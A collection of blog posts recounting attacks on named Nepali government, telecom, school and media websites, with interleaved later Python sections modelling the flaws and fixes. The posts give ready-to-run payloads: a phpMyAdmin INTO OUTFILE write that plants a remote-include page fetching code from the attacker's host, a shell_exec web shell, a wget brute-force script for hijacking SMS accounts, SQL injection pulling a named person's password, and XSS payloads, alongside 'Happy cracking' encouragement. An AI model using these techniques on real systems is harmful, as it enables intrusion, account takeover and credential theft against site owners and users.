
Sunday, January 6, 2008

Nepal Government's Inland Revenue Department (web.ird.gov.np) (Nepali) Website Cracked

Please do not take this posting as an offense against your website. Our motive is to let you know about insecurities in your website and to give you options to improve them.

Information
It has been quite some time since the Inland Revenue Department's website went up. It has features like e-PAN and filing PAN and tax bills online, and it lists general information about the IRD.

Level of Vulnerability
9/10: I was able to run commands on the server, DOS commands at that!! del C:\*.*, kidding!!

Background
The website actually seems to be hosted on two different servers:
1) http://ird.gov.np
$ nslookup ird.gov.np
Non-authoritative answer:
Name: ird.gov.np
Address: 63.219.2.40

2) another subdomain, http://web.ird.gov.np
$ nslookup web.ird.gov.np
Non-authoritative answer:
Name: web.ird.gov.np
Address: 116.90.235.4

Looking at the website, the information is arranged in pages and the URLs have a page=xyz type of syntax. Hmm, XSS?? And the table-based layout! (1980s? albeit an exaggeration.) And the background image repeating along the x axis; they couldn't even write one CSS rule, background-repeat: no-repeat;. Optimized for 800x640 resolution, and they forgot 1024x768?? Overall, very, very disappointing. The footer says "Designed and Developed by Professional Computer System". What a shame!!

The Crack
Strangely, I don't know why, I typed http://web.ird.gov.np/phpmyadmin/ and to my delight it was unsecured!! An unprotected, untouched phpMyAdmin, although the databases were empty. Meaning the core database is somewhere else, a pirated Oracle server ;-) my guess only!

So I'm stuck with an empty phpMyAdmin; what more can be done?
An hour of research!! And I found out that MySQL actually has syntax to write query output to a file: SELECT ... INTO OUTFILE. The file is written by the MySQL server process, anywhere that process can write, provided the MySQL account has the FILE privilege, which the account behind this phpMyAdmin evidently had.

Here is what I did,
Steps
1) Went to the Query section of phpMyAdmin
2) Executed this SQL (the PHP one-liner inside the quotes is what page.php has to contain for step 3 to work; the post's own listing showed an empty string here, most likely because the blog's HTML rendering swallowed the <?php tag, so it is reconstructed from what step 3 says page.php does):
select '<?php include($_GET["page"]); ?>' into outfile '/path/to/www/root/pan/page.php'

3) Hurrah! We got a working page.php, i.e. http://web.ird.gov.np/pan/page.php, that takes as its argument a URL to any file, local or remote; the PHP configuration evidently allowed remote URLs in include(). YES, it can be this easy!
Example: http://web.ird.gov.np/pan/page.php?page=http://someaddress/c.txt?asdf :-) NICE (the trailing ?asdf is the usual habit for when the including script appends something to the parameter; it is harmless here)

4) Fired up my local server, at IP address, say, 10.10.10.10 (assumed)

5) First I executed this PHP script (served from my machine as c.txt, see step 6)
<?php
// When included by page.php, this writes the editor script below into ./sth.php
// on the including server, i.e. into the IRD web root.
$a = '<?php
// if $_POST["fname"] is not empty, save the posted content to that file
if (!empty($_POST["fname"])) {
    echo "Save Now";
    // overwrites by default; pass FILE_APPEND as 3rd argument to append.
    // stripslashes undoes the escaping magic_quotes_gpc adds to POST data.
    file_put_contents($_POST["fname"], stripslashes($_POST["fc"]));
} else {
    echo "No Save";
}

$f = file_get_contents($_GET["f"]); ?>
<form method="post">
<input type=hidden value="<?php echo $_GET["f"]; ?>" name=fname />
<textarea rows=25 cols=100 name=fc><?php echo $f; ?></textarea>
<input type=submit value="save">
</form>
<?php echo $_POST["fname"]; ?>
<pre>
<?php echo htmlspecialchars(stripslashes($_POST["fc"]), ENT_QUOTES); ?>
</pre>';

file_put_contents('./sth.php', $a);
echo "Output successful";
?>


What it does is save this PHP
<?php
// if $_POST["fname"] is not empty, save the posted content to that file
if (!empty($_POST["fname"])) {
    echo "Save Now";
    // overwrites by default; pass FILE_APPEND as 3rd argument to append
    file_put_contents($_POST["fname"], stripslashes($_POST["fc"]));
} else {
    echo "No Save";
}

$f = file_get_contents($_GET["f"]); ?>
<form method="post">
<input type=hidden value="<?php echo $_GET["f"]; ?>" name=fname />
<textarea rows=25 cols=100 name=fc><?php echo $f; ?></textarea>
<input type=submit value="save">
</form>
<?php echo $_POST["fname"]; ?>
<pre>
<?php echo htmlspecialchars(stripslashes($_POST["fc"]), ENT_QUOTES); ?>
</pre>


under the filename sth.php. But then what does sth.php do? If you look at the arguments it takes, the GET argument f is a filename; it loads that file from the server into a textarea, ready to be edited, and the form posts it back to be written. Works like a charm.
<?php $f = file_get_contents($_GET["f"]); ?>


6) How did I execute it? Renamed the script to c.txt (so my own server would send it as plain text rather than run it) and requested
http://web.ird.gov.np/pan/page.php?page=http://10.10.10.10/c.txt?asdf and voila, I have a brand new sth.php to work with.

7) As part of the demo I edited footer.php to put "hacked by n00b" in it; here is a screen capture



8) Lastly, to have some fun, I created a PHP file to run any command through shell_exec(). Here is the PHP file

<?php
// Runs the posted command through the server's shell (cmd.exe on this WAMP box)
// and shows stdout and stderr. The space before 2>&1 matters, or "dir" becomes "dir2".
if (!empty($_POST["test"])) {
    $output = $_POST["test"] . " 2>&1";
    echo "<pre>" . shell_exec($output) . "</pre>";
}
?>
<form method="post">
<input name="test"/>
<input type="submit" value="send"/>
</form>


The server was an unsecured WAMP, so I could do dir, copy, move; it was a virtual DOS prompt!! :-D

How to fix it?
Well, duh!! WAMP is for home use; for production it has to be secured!! See the WAMP homepage for details. Concretely, every link in the chain above was a separate mistake: phpMyAdmin reachable by anyone without authentication; the MySQL account having the FILE privilege, so INTO OUTFILE could write into the web root (drop FILE from the application's account and point secure_file_priv at a directory outside the web root); a web root writable by the MySQL server process; a page that passes a request parameter straight into include(); and PHP allowed to fetch remote URLs in include() (set allow_url_include=Off). Fixing any one of these would have stopped this particular chain.
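Added example, not from the original post or from the IRD site: what page.php should have done with its ?page= parameter, sketched in Python so it can be run anywhere. The fix is an allowlist of page names plus a realpath containment check; ALLOWED_PAGES, the directory layout and the sample requests are assumptions, and the remote URL is the one from the post.

```python
"""What page.php should have done with ?page=, sketched in Python.

Added example, not from the original post or the IRD site. The fix pattern is
an allowlist of page names plus a realpath containment check; ALLOWED_PAGES
and the directory layout are assumptions.
"""
import os
import tempfile
from urllib.parse import urlsplit

ALLOWED_PAGES = {"home", "about", "epan"}  # assumed: the only pages the site serves


class PageRejected(ValueError):
    """Raised for anything that is not a known local page."""


def resolve_page(base_dir: str, requested: str) -> str:
    """Map ?page=<requested> to a file under base_dir, or raise PageRejected."""
    # 1. No scheme: kills page=http://10.10.10.10/c.txt (and php://, data:, ...).
    if urlsplit(requested).scheme:
        raise PageRejected("URLs are not pages: %r" % requested)
    # 2. Allowlist: the site knows its own pages; anything else is noise.
    if requested not in ALLOWED_PAGES:
        raise PageRejected("unknown page: %r" % requested)
    # 3. Containment: even a listed name must resolve to a file inside base_dir.
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, requested + ".php"))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PageRejected("path escapes %s: %r" % (base_dir, requested))
    if not os.path.isfile(candidate):
        raise PageRejected("no such page file: %r" % requested)
    return candidate


def demo() -> dict:
    """Create a throwaway page directory and classify a few constructed requests."""
    requests = (
        "home",                                   # legitimate
        "http://10.10.10.10/c.txt?asdf",          # the post's remote include
        "../../wamp/www/pan/footer.php",          # traversal to another file
        "php://filter/resource=index.php",        # wrapper scheme
        "epan.php",                               # right page, wrong spelling
    )
    with tempfile.TemporaryDirectory() as d:
        for name in ALLOWED_PAGES:
            with open(os.path.join(d, name + ".php"), "w") as fh:
                fh.write("<?php /* %s */ ?>" % name)
        verdicts = {}
        for req in requests:
            try:
                resolve_page(d, req)
                verdicts[req] = "served"
            except PageRejected as exc:
                verdicts[req] = "rejected: " + str(exc)
    return verdicts


if __name__ == "__main__":
    for req, verdict in demo().items():
        print("%-40s %s" % (req, verdict))
```

The three checks are deliberately independent: the allowlist alone would already stop every request in the demo, but the scheme check documents the remote-include case explicitly and the realpath check survives a later change that lets page names come from a database instead of a fixed set.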

The admins of http://ird.gov.np have already been informed, and they fixed it up very quickly. I'm glad, but the design looks the same, no improvement, nothing.

At least it wasn't another Iranian hack!! I'm not all badass! :-D

Unauthorized Access / Hijacking an NTC WebSMS Account

Please do not take this posting as an offense against your website. Our motive is to let you know about insecurities in your website and to give you options to improve them.

Information
NTC WebSMS is a very popular service for sending SMS to any holder of an NTC Namaste SIM card from their website. One can send at most 10 SMS per day and the service is totally free, although with a twist: it is available only to NTC SIM card holders, since to get an account you need to enter your SIM's PIN number. Fine!!

When an SMS is sent, the recipient receives an SMS from 2424 with the original number as the sender in the SMS header. This is how the recipient knows who sent it.


Level of Vulnerability

7/10, since hijacking someone else's account is possible, but then you cannot do much more with it than send SMS.

The Flaw
I wonder what people think when they create software. Do they think, OMG, I've got to finish this application ASAP, I'm drunk and it's due tomorrow? Probably not, but the password reset option on the website is seriously flawed!!

Steps involved in resetting a password.
1) Go to the login page, click Forgot Password
2) Enter the cell phone number of the account, 9841123456 (example), click Submit
3) You get a message that the password HAS BEEN RESET and to check your email for further details.

Oh, so now anyone can submit my cell phone number and hit Submit; the password is instantly changed, and the next time I try to log in I cannot, because the password was changed by some psycho and I wasn't asked for any confirmation. LAME, LAME!! I then have to open the associated email account and search for the email.

Dissection of the new password
I got the email alright with my new password, and it looks strikingly predictable. The format of the new password:
if my username is 9841123456, my password is set to 9841123456XXX.0

Cough! Cough! The XXX is some randomly chosen number, could be 000 or 512 or any other number between 000 and 999. That is only 1000 possible passwords, and the attacker already knows the other ten characters.


The Hack
You must have guessed it by now, but I still list the steps for everyone's convenience

To hack the WebSMS account of 9841123456, follow these steps
Steps
1) Go to the login page, click on Forgot Password, type 9841123456, hit Submit
2) Since the new password has gone to the original owner, we now brute force WebSMS!
3) In my case, I created a bash shell script that uses wget to POST the username and password variables, trying the passwords 9841123456000.0 to 9841123456999.0 in turn
4) Each returned page is saved to 000.txt ... 999.txt (yes, 1000 txt files)
5) I look at the results and sort the files by size
6) The page saying username/password invalid is 3 KB in size, while the page after a successful login is around 16 KB
7) So if 512.txt is bigger than all the rest, the new password is 9841123456512.0
8) Log in to WebSMS with this password, go to Options and change the settings, i.e. the primary email, so that the next time anyone resets the password, I get the new one!


Script
Save the following lines as pwfinder.sh, give it execute permission, and change the value of b to the target username. The zero padding has to be kept explicitly: a plain ((a=a+1)) turns 000 into 1, which would try 98411234561.0 instead of 9841123456001.0.
#!/bin/bash
b=9841123456        # username (phone number) whose password was just reset
a=0
while [ "$a" -lt 1000 ]
do
    printf -v s '%03d' "$a"   # three digits with leading zeros: 000, 001, ..., 999
    wget "http://websms.ntc.net.np/websmss/login.jsp" --post-data="username=$b&password=$b$s.0&flag=1" -O "$s.txt"
    ((a=a+1))
done


Pretty simple.
I did put an & at the end of the wget line so it ran in the background, but then the number of simultaneous connections to NTC's web server was very high and it was giving weird results. Without the &, there is at most one connection to NTC's WebSMS server at a time, so the results were as expected.

Find out which file is the biggest; use your favourite file browser, or in my case
$ du -a . | sort -n
and the file is at the bottom.
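As an added example, not code from the original post or from NTC, here is the same attack modelled offline in Python: a constructed stand-in for the WebSMS login that hands out the predictable reset password and answers with a big page on success and a small one on failure, the 000..999 sweep that reads that size difference, and the random reset secret the site should have issued instead. The 3 KB / 16 KB sizes are the post's; the class, function names and phone numbers are mine.

```python
"""The WebSMS reset flaw modelled offline: a reset password drawn from only
1000 candidates, found through the page-size oracle the post describes.

Added example, not code from the original post or from NTC. FakeWebSms is a
constructed stand-in for the login page; the ~3 KB failure / ~16 KB success
sizes come from the post, everything else here is assumed.
"""
import hmac
import random
import secrets


class FakeWebSms:
    """Constructed model of the forgot-password and login behaviour."""

    def __init__(self):
        self.passwords = {}

    def forgot_password(self, username: str) -> None:
        # The flaw: new password = username + three digits + ".0", so 1000 candidates.
        self.passwords[username] = "%s%03d.0" % (username, random.randrange(1000))

    def login(self, username: str, password: str) -> bytes:
        # A successful login renders a big page, a failure a small error page.
        ok = hmac.compare_digest(self.passwords.get(username, ""), password)
        body = b"x" * 16000 if ok else b"username/password invalid"
        return b"<html><body>" + body + b"</body></html>"


def brute_force(server: FakeWebSms, username: str):
    """The post's attack: try 000..999 and stop at the first oversized response.
    Returns (password, attempts); (None, 1000) if nothing matched."""
    for n in range(1000):
        candidate = "%s%03d.0" % (username, n)
        if len(server.login(username, candidate)) > 8192:   # between 3 KB and 16 KB
            return candidate, n + 1
    return None, 1000


def strong_reset_password() -> str:
    """What the reset should issue instead: a random secret the attacker cannot
    enumerate (128 bits, so about 2**127 expected guesses instead of 500)."""
    return secrets.token_urlsafe(16)


def reset_attack_demo():
    """Weak reset gets cracked within 1000 requests; a strong one does not."""
    server = FakeWebSms()
    server.forgot_password("9841123456")
    cracked, attempts = brute_force(server, "9841123456")

    server.passwords["9841654321"] = strong_reset_password()
    uncracked, _ = brute_force(server, "9841654321")
    return cracked == server.passwords["9841123456"], attempts, uncracked


if __name__ == "__main__":
    found, tries, leftover = reset_attack_demo()
    print("weak reset cracked: %s after %d attempts" % (found, tries))
    print("strong reset cracked: %s" % (leftover is not None))
```

The random secret fixes the keyspace, but the other half of the post's complaint still stands: a reset that fires on an unauthenticated submit and a login that answers 1000 attempts without slowing down need a confirmation step and lockout or rate limiting regardless of how the password is generated.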

Cheers All
Happy cracking

PS. Do brute force the username admin, I saw some pretty nice links in it!!

Saturday, September 29, 2007

Kathmandu School of Law website (ksl.edu.np) vulnerable to SQL injection (minor hack)

Please do not take this posting as an offense against your website. Our motive is to let you know about insecurities in your website and to give you options to improve them.

Thanks go to laex8pearl for finding the loophole and mentioning the website.

Information
The mission page of Kathmandu School of Law states that "It is an emerging legal institution pioneering in the field of imparting quality education and is dedicated to maintain high standards of academic excellence. Its prime objective is to address the need of an academically sound and practically feasible legal education in Nepal."

Level of vulnerability
7/10, since we can extract passwords ^__^

Review of Kathmandu School Of Law Website
Most of the pages are written in ASP. The front pages are not very interesting in terms of finding security flaws, since they have general content. The interesting part is the articles section, which has dynamic content and dynamic URLs.

The login page can be seen at http://www.ksl.edu.np/login.asp

SQL Injection In Detail
It starts with testing whether inputs are escaped or not; well, not on this website.
On the login page, enter ' or ' in both username and password and we're inside. :-) Pretty simple. Well, nothing interesting inside though: we can post articles but not edit them, nothing interesting at all.

To see what database they are using, enter ' garbage in both username and password and, as expected, you get a simple error. In the case of ksl.edu.np the output is

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver]
Syntax error (missing operator) in query expression 'email='' garbage' and password='' garbage''./login_validate.asp, line 25

OK, so the Access driver, not even a database server. Hmm, a small site, can't expect much.

The real fun comes now. On the login screen we are asked to enter an email address and a password, so let's find some existing users.

On the articles section a couple of users are listed; let's see if we can find more info on at least one of them.

OK, got it, here is one

Nice, it seems he is the director of KSL. Lucky me, let's find his password :-D

For this we will exploit the article display page. Take a look at the URL of the articles page. It is in the format http://www.ksl.edu.np/view_article.asp?id=24; different articles have different ids.

Let's test it to get some more results: http://www.ksl.edu.np/view_article.asp?id=24 or id=23 yields a different article. Hmm, it seems there is an ORDER BY id at the end, i.e. the ASP displays the article with the lowest id.

Interesting!!! Let's add our own row with id=1, the minimum. How do we achieve it? With SQL UNION SELECT.

First we need the name of the table; an easy guess, article, works!!! Yeah!!!
http://www.ksl.edu.np/view_article.asp?id=24 union select 1,1 from article

It gives an error, saying this

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.

/view_article.asp, line 56

Interestingly, UNION SELECT works but the number of columns does not match. Trial and error led me to 8 columns, i.e. this URL works fine: http://www.ksl.edu.np/view_article.asp?id=24 union select 1,2,3,4,5,6,7,8 from article

Great, the title is in the 5th column and the body in the 6th. What next? Let's see if we can find the password of an existing user; that should be pretty simple, huh??

First we need to guess the name of the table containing the passwords; the most probable guesses are accounts, users, members, ... in singular and plural forms. Lucky me, it's member.

So how do we see the password?? Put this in the URL (the email is the director's, found on the articles page). Because 1 sorts before 24, the injected row is the one displayed, and its 6th column, the body, is the subquery's result
http://www.ksl.edu.np/view_article.asp?id=24 union select 1,2,3,4,5,(select password from member where email='sangroula@wlink.com.np'),7,8 from article



WORKS GREAT!!! Finally, a password.

How to remove the SQL injection from the Kathmandu School Of Law website (ksl.edu.np)? It's really, really simple:
Rule number 1: never trust the user. Never concatenate input into a SQL string; use parameterized queries (in classic ASP, an ADODB.Command with Parameters), validate every input, and escape everything you output.
Rule number 2: never display SQL errors; log them and show a generic error page or redirect to a "page not found".
Rule number 3: use a framework like Drupal, Mambo or Joomla, because they include the community effort of thousands of people and get security fixes you would never write yourself, as long as you keep them updated.

The admin of http://www.ksl.edu.np has been emailed about this,
so don't be surprised if this no longer works.

Wednesday, September 19, 2007

CyberSansar website Vulnerable to Cross Site Scripting (XSS) (Moderate hack)

Please do not take this posting as an offense against your website. Our motive is to let you know about insecurities in your website and to give you options to improve them.

Information
CyberSansar is one of the most visited websites in Nepal. Its popularity is due to its content, which includes pictures of hot models. I haven't heard of another website with so many pictures of hot Nepali females, and my guess is that this website is a major attraction for a lot of Nepali males :-)

Level of Vulnerability 3/5

Review Of CyberSansar Website
Most of the web pages seem to take no arguments at all, and strangely each link points to a specifically named PHP file: every artist has an artistname.php, and event information is in event.php-style files.

This means the guys at CyberSansar must have a hell of a time managing all those .php files. My guess is that they have a centralized theming system and all pages use that theme.

To execute XSS I had to find a page taking arguments. The download page is where I found it:
http://www.cybersansar.com/music/videos/music_videos.php; clicking on any picture takes you to, say,
http://www.cybersansar.com/music/videos/video.php?id=drabyaz_dherailamo#download

Cross Site Scripting (XSS) in Detail
http://www.cybersansar.com/music/videos/video.php?id=drabyaz_dherailamo#download is an interesting URL. I can just change the text after ?id= in video.php?id=drabyaz_dherailamo#download to anything else, say xyz
http://www.cybersansar.com/music/videos/video.php?id=xyz
This time what you get is a small "picture not found" image like this

Looking at the source, what you can see is


That means whatever you type after video.php?id= gets added to a URL inside the page's HTML, and so the URL changes. Hmm, good.
If you test with characters like ", <, >, /, ... they all pass through without any kind of escaping. Not good at all. Someone forgot to check the security.

A simple URL like
http://www.cybersansar.com/music/videos/download_events_programs.php?id="> <script>alert("hello");</script>
will give you an alert message. Hmm, scripts execute successfully.

To display another web page it's pretty simple, just include an iframe like this
url starts from here ----------------------
http://www.cybersansar.com/music/videos/download_events_programs.php?id="><iframe src="http://www.google.com" height="400" width="500"><
url ends here ---------------------
will give you this


Cool huh?? But how do I deface CyberSansar?
Actually you cannot damage the server using XSS, AFAIK: what runs is the attacker's JavaScript in the visitor's browser, in the context of cybersansar.com, and only for visitors who open the crafted URL.

How can this be misused?
There are tons of articles explaining the misuse of XSS, so please read them.

Some of the misuses I can think of are
  • Inclusion of JavaScript from third-party websites means a lot of things. The whole DOM is under the control of the script, so a malformed URL can change the look of the website for whoever follows it.
  • Since CyberSansar is very popular, anyone can just create a page, add pictures of herself/himself and advertise as a model of CyberSansar.
  • The Google web page is just an example; what if someone shows a porn site and tries to defame CyberSansar?
  • Include a fake phishing page with username and password fields saying "Insert your Hotmail username/password here and we will send your friends a special something". Hmm, interesting.
Lots of other misuses are possible. XSS is dangerous, especially with old versions of IE or otherwise vulnerable browsers.

How to remove the XSS vulnerability in CyberSansar??
Pretty simple: escape the passed id with htmlspecialchars() in PHP before echoing it, very simple :-)

$id = htmlspecialchars($_GET['id'], ENT_QUOTES);

A single line can work wonders. :-) One caveat: this is the right escaping for text and for quoted attribute values, which is where id lands here; ENT_QUOTES is added because the default flags leave ' alone, so a single-quoted attribute would otherwise stay injectable. If the same value were ever written into a <script> block or an unquoted attribute, HTML escaping would not be enough.
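Added example, not CyberSansar's code: a Python stand-in for video.php that reflects ?id= into a double-quoted src attribute, rendered once as found and once escaped the way htmlspecialchars(..., ENT_QUOTES) would, with an HTML parser used to confirm that the post's two payloads no longer produce an element. The template markup is constructed; the payloads are the ones quoted above.

```python
"""The reflected XSS from the post, and the htmlspecialchars-style fix, in Python.

Added example, not CyberSansar's code: the template is a constructed
stand-in for video.php that drops ?id= into a double-quoted src attribute,
which is the context the post's "> payloads break out of.
"""
import html
from html.parser import HTMLParser

# The two payloads quoted in the post.
SCRIPT_PAYLOAD = '"> <script>alert("hello");</script>'
IFRAME_PAYLOAD = '"><iframe src="http://www.google.com" height="400" width="500"><'

EXPECTED_TAGS = {"html", "body", "a", "img"}  # what the constructed template emits by itself


def render_video_page(video_id: str, escape: bool) -> str:
    """Constructed template. escape=False is the site as found; escape=True is
    the fix, html.escape(quote=True) being Python's htmlspecialchars(..., ENT_QUOTES)."""
    shown = html.escape(video_id, quote=True) if escape else video_id
    return (
        '<html><body>'
        '<a href="/music/videos/%s.wmv">Download</a>'
        '<img src="/music/videos/thumbs/%s.jpg" alt="video">'
        '</body></html>'
    ) % (shown, shown)


class _TagCollector(HTMLParser):
    """Records every start tag the browser-side parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(page: str) -> set:
    """Elements in the rendered page that the template itself never emits."""
    parser = _TagCollector()
    parser.feed(page)
    return set(parser.tags) - EXPECTED_TAGS


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, IFRAME_PAYLOAD):
        print("raw:     ", injected_tags(render_video_page(payload, escape=False)))
        print("escaped: ", injected_tags(render_video_page(payload, escape=True)))
```

The parser check is the useful part for a site owner: rather than eyeballing page source, render the page with a known payload and assert that the set of elements is exactly what the template produces.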

The admin of http://www.cybersansar.com has been emailed about this,
so don't be surprised if this no longer works.

XSS Cheat Sheet at http://ha.ckers.org/xss.html
Big thanks to them.

Tuesday, September 18, 2007

Kantipur Engineering College website vulnerable to SQL Injection (minor hack)

Please do not take this posting as an offense against your website. Our motive is to let you know about insecurities in your website and to give you options to improve them.

Kantipur Engineering College is one of the well-known colleges of KTM. It provides undergraduate studies for a Bachelor of Engineering in Computer Science, Electronics Engineering and other faculties.
Please see their website at http://www.kec.edu.np.

Level of vulnerability 1/5
SQL Injection in detail

Most of the pages appear static, with no option for URL modification or fiddling.
The only place to tinker with is the news section, which can be seen in a small column on the right.

The URL is http://www.kec.edu.np/news.php?id=5. Now this is very lucrative, since it is so common to just change the id and see what comes out.

At id=5 we get


To inject a simple bit of SQL we just change the 5 into some text, say asdf, and you get
Unknown column 'asdf' in 'where clause'
This shows that the query is something like
select * from <table> where id=variablename
with the id dropped in unquoted, and the above error is exactly what MySQL gives when a bare word is put in place of the number: it is parsed as a column name, not as a string.

what about
http://www.kec.edu.np/news.php?id=news_id
or
http://www.kec.edu.np/news.php?id=1 OR 1=1 or news.news_id=1 order by news.news_title desc


Hmm, it seems that it executes OK with no error. So we know one of the column names of the table.
Finally, with a simple human guess, the table should be named news, so doing a simple
http://www.kec.edu.np/news.php?id=news.news_id
gives us every row in the news table, since news_id=news.news_id is true for every row.

These are the fields of the news table:
news_id, news_title, news_date
which is seen by successfully executing this line

http://www.kec.edu.np/news.php?id=1 OR 1=1 or news.news_id=1 order by news.news_title, news.news_date desc


Also, we can do UNION SELECT, which means pretty much anything. But I bet they don't have anything interesting. The homepage already has &nbsp; all around the top links; very bad web design.
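As an added example, not code from this post or from the Kathmandu School of Law post above, here is the injection logic of both replayed against an in-memory SQLite database: the quote-breaking login bypass, the UNION column-count probe and password extraction from a guessed table (KSL), the "unknown column" probe that tells real column names from guesses (KEC), and the parameterized query that ends all of it. The schema, rows, email and password are constructed; the login payload is written as ' OR ''=' so it evaluates the same way in SQLite, and SQLite's error messages differ from Access and MySQL, but the probing works identically.

```python
"""The two injections from the KSL and KEC posts replayed against SQLite.

Added example, not code from either post. The schema, rows, e-mail and
password below are constructed; the SQL shapes (a login that concatenates
email/password, an article page that concatenates ?id=) follow the posts.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed data: one member, one article with 8 columns, one news row."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE member (id INTEGER, email TEXT, password TEXT);
        INSERT INTO member VALUES (1, 'director@example.edu', 'S3cret!');
        CREATE TABLE article (id INTEGER, a2, a3, a4, title TEXT, body TEXT, a7, a8);
        INSERT INTO article VALUES (24, 0, 0, 0, 'Hello', 'First article', 0, 0);
        CREATE TABLE news (news_id INTEGER, news_title TEXT, news_date TEXT);
        INSERT INTO news VALUES (5, 'Admissions open', '2007-09-18');
    """)
    return db


# --- the vulnerable pattern from both posts: string concatenation --------------

def login_vulnerable(db, email: str, password: str) -> bool:
    sql = "SELECT 1 FROM member WHERE email='%s' AND password='%s'" % (email, password)
    return db.execute(sql).fetchone() is not None


def view_article_vulnerable(db, raw_id: str):
    """view_article.asp: lowest id wins, which is what the UNION trick relies on."""
    return db.execute("SELECT * FROM article WHERE id=%s ORDER BY id" % raw_id).fetchone()


def news_vulnerable(db, raw_id: str):
    return db.execute("SELECT * FROM news WHERE news_id=%s" % raw_id).fetchall()


# --- the probing the posts describe -------------------------------------------

def probe_error(db, raw_id: str) -> str:
    """KEC step 1: a bare word where a number belongs is parsed as a column name."""
    try:
        news_vulnerable(db, raw_id)
        return ""
    except sqlite3.OperationalError as exc:
        return str(exc)          # MySQL: Unknown column 'asdf' in 'where clause'


def find_union_width(db, max_cols: int = 16) -> int:
    """KSL step: grow UNION SELECT 1,2,... until the column counts match."""
    for n in range(1, max_cols + 1):
        probe = "24 UNION SELECT %s FROM article" % ",".join(str(i) for i in range(1, n + 1))
        try:
            view_article_vulnerable(db, probe)
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("no matching column count up to %d" % max_cols)


def steal_password(db, email: str) -> str:
    """KSL step: a subquery in the body column (6th); id=1 sorts before 24,
    so the injected row is the one the page displays."""
    fields = ["1"] * find_union_width(db)
    fields[5] = "(SELECT password FROM member WHERE email='%s')" % email
    row = view_article_vulnerable(db, "24 UNION SELECT %s FROM article" % ",".join(fields))
    return row[5]


def guess_columns(db, table: str, candidates) -> list:
    """KEC step 2: ORDER BY <table>.<name> succeeds only for real column names."""
    found = []
    for name in candidates:
        try:
            news_vulnerable(db, "1 OR 1=1 ORDER BY %s.%s" % (table, name))
            found.append(name)
        except sqlite3.OperationalError:
            pass
    return found


# --- the fix: parameters, never concatenation ---------------------------------

def login_fixed(db, email: str, password: str) -> bool:
    row = db.execute("SELECT 1 FROM member WHERE email=? AND password=?",
                     (email, password)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("bypass (vulnerable):", login_vulnerable(db, "' OR ''='", "' OR ''='"))
    print("bypass (fixed):     ", login_fixed(db, "' OR ''='", "' OR ''='"))
    print("error probe:        ", probe_error(db, "asdf"))
    print("union width:        ", find_union_width(db))
    print("stolen password:    ", steal_password(db, "director@example.edu"))
    print("news columns:       ", guess_columns(db, "news",
          ["news_id", "news_title", "news_date", "title", "author"]))
```

The same driver-level fix applies to news.php: with a parameter bound as an integer, id=asdf, id=news.news_id and id=1 OR 1=1 are all rejected before any SQL is parsed, and the "Unknown column" message that did the reconnaissance here never reaches the browser.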

How to remove the SQL injection??
The techniques are widely discussed on various websites.
  • This is a very helpful link on how to prevent SQL injection:
    http://www.unixwiz.net/techtips/sql-injection.html#miti
  • Cast numeric parameters to integers, or bind them as parameters of a prepared statement, before they go anywhere near the query; news.php?id= should never see a string at all.
  • It's a bad idea to create a website from scratch, because there will be lots of places we would most probably overlook. SQL injection is just one of many loopholes for hackers to get into our website.
Comments are more than welcome. We hope this helped the original web author of the website to fix his/her flaws.

The admin of http://www.kec.edu.np has been emailed about this,
so don't be surprised if this no longer works.

Update
The mentioned email admin@kec.wlink.com.np bounced, :-| so even their official email does not work. Somebody please inform the college web admins.